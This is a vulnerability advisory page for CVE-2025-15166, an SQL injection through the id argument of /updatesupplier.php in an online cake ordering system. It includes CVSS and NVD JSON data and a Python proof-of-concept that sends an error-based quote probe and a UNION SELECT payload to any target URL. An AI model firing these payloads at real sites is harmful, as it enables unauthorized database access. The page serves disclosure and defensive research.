Security Vulnerability Report
CVE-2025-15166 CVSS 7.3 HIGH

CVE-2025-15166

Published: 2025-12-29 02:15:43
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in itsourcecode Online Cake Ordering System 1.0. This affects an unknown function of the file /updatesupplier.php?action=edit. The manipulation of the argument ID results in SQL injection. The attack may be launched remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score
7.3 (Secondary-typed CVSS v3.1 rating; the Primary-typed CVSS v3.1 entry in the raw JSON below scores the same issue 9.8 CRITICAL)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:admerc:online_cake_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Online Cake Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
Proof-of-concept probe for CVE-2025-15166.

Exercises the SQL injection in itsourcecode Online Cake Ordering System 1.0
via the ``id`` argument of ``/updatesupplier.php?action=edit``. Both checks
below only send a request and look at the HTTP response; nothing is parsed
out of the response body. On the application side the defect is removed by
binding ``id`` as a prepared-statement parameter instead of interpolating it
into the SQL string.
"""
import requests
import sys

# Substrings whose presence in the response body is treated as evidence of a
# database error surfacing in the page. Compared case-insensitively.
_ERROR_MARKERS = (
    "SQL syntax",
    "MySQL",
    "Warning",
    "mysql_fetch",
    "mysql_num_rows",
    "syntax error",
)


def test_sql_injection(url, target_id="1"):
    """Send a single-quote probe on ``id`` and report whether an error marker appears.

    Args:
        url: Base URL of the deployment, without a trailing slash.
        target_id: Value placed in ``id`` ahead of the probe character.

    Returns:
        True if any entry of ``_ERROR_MARKERS`` occurs in the response body,
        False if none does or the HTTP request itself fails.
    """
    probe_url = f"{url}/updatesupplier.php?action=edit&id={target_id}'"
    print(f"[*] Testing target: {probe_url}")
    try:
        body = requests.get(probe_url, timeout=10).text.lower()
    except requests.exceptions.RequestException as exc:
        print(f"[-] Request failed: {exc}")
        return False
    # First marker found wins; the original list order is preserved above.
    hit = next((marker for marker in _ERROR_MARKERS if marker.lower() in body), None)
    if hit is None:
        print("[-] Basic test did not confirm vulnerability")
        return False
    print("[+] SQL Injection vulnerability confirmed!")
    print(f"[+] Error indicator found: {hit}")
    return True


def extract_data(url, target_id="1"):
    """Send the fixed UNION SELECT payload on ``id`` and report the HTTP status.

    Args:
        url: Base URL of the deployment, without a trailing slash.
        target_id: Accepted for symmetry with ``test_sql_injection`` but not
            used — the payload replaces the whole ``id`` value.

    Returns:
        None. Prints two lines when the server answers 200; the response body
        is never inspected, so nothing is actually extracted here.
    """
    union_payload = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16---"
    request_url = f"{url}/updatesupplier.php?action=edit&id={union_payload}"
    print("[*] Extracting database info...")
    try:
        status = requests.get(request_url, timeout=10).status_code
    except requests.exceptions.RequestException as exc:
        print(f"[-] Request failed: {exc}")
        return
    if status == 200:
        print("[+] Database info extraction request sent")
        print("[+] Check response for extracted data")


def _main(argv):
    """Read the single positional target URL and run the two checks in order.

    Exits with status 1 when no URL is given. The UNION request is issued
    only after the error-marker probe has returned True.
    """
    if len(argv) < 2:
        print("Usage: python cve-2025-15166.py <target_url>")
        print("Example: python cve-2025-15166.py http://target.com/cake-ordering")
        sys.exit(1)
    base = argv[1].rstrip('/')
    banner = "=" * 60
    print(banner)
    print("CVE-2025-15166 SQL Injection PoC")
    print(banner)
    if test_sql_injection(base):
        print("\n[*] Proceeding with data extraction...")
        extract_data(base)


if __name__ == "__main__":
    _main(sys.argv)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15166", "sourceIdentifier": "[email protected]", "published": "2025-12-29T02:15:42.727", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in itsourcecode Online Cake Ordering System 1.0. This affects an unknown function of the file /updatesupplier.php?action=edit. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admerc:online_cake_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": 
"6990FB82-E8CB-4B16-B293-4DDDF0627D47"}]}]}], "references": [{"url": "https://github.com/LaneyYu/cve/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.338545", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338545", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721108", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}